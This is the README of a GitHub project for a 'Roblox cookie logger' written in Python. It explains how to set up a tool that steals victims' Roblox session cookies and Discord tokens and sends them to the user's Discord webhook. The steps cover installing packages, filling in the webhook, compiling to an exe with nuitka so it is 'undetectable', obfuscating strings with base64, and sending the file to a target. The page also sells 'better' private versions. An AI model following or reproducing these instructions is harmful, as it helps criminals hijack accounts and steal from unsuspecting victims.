/Roblox-Cookie-Logger

Fast and efficient Roblox cookie logger made in python

Primary LanguagePythonOtherNOASSERTION

screw off skid

Errors

I have been notified that nuitka doesnt currently work, and pyinstaller doesnt work for me. You can somewhat hide the code by using py_compile, no need to pip install, just do python -m py_compile main.py, afterwards, you can rename the file from a .pyc to a .py, although this does have limitations. If you want to hide the strings, you must base64 encode and decode all of the things in the "". OR (get ready the fix) go learn c or c++ and make it yourself like a true chad.

Important

Please stop dming me, saying that you dont get how it works. Please fully read the README. I work on this project on my free time, if you ever want to support me with any donations, I accept bitcoin. You can dm me and ill give you all of my perks for supporting me with 5 dollars. Thanks :D

Update Status

I will probably never update this but I will give private and better versions to people who gib mone.


Logo

CronicCookie

Smooth and quick cookie logger for account recovery.
View Demo · Report Bug · Request Feature

Table of Contents

  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. License
  7. Contact
  8. Acknowledgements

About The Project

Welcome to the newest release of Cronic Cookie, a speedy cookie logger. This is my main project and I am working more and more on it. This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.

Built With

Getting Started

To get a local copy up and running follow these simple steps.

Prerequisites

This is an example of how to list things you need to use the software and how to install them.

- Go to the folder with all of the files.
- In the navigation bar (C:/Users/%user%/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up "the shell".
- Now install the packages as instructed.

Installation

  1. Download the .zip of this repository
    git clone https://github.com/DaEpicSwag/Roblox-Cookie-Logger.git
    
  2. Install PIP packages
    pip install nuitka
    pip install requests
    pip install browser_cookie3
    pip install discord-webhook
    

Usage

  • Replace your webhook. If you are using the advanced logger, make sure to fill in the webhook for the token logger and the cookie logger which are in diffrent locations.

  • Compile to exe using nuitka PLEASE AND NOT PYINSTALLER. Why?

1. Harder to crack because Pyinstaller just unloads the source into the temp directory
2. Undetectable
3. Faster
4. Smaller file size that works well when compressed.
  • Nuitka How To
1. Access the "Shell"
2. python -m nuitka urfile.py
  • Send it over.

Roadmap

See the open issues for a list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE for more information.

Contact

Discord - @SonicTheHedHog#7171

Project Link: Roblox-Cookie-Logger

Acknowledgements

  • PogScriptR Thanks for the request webhook explaination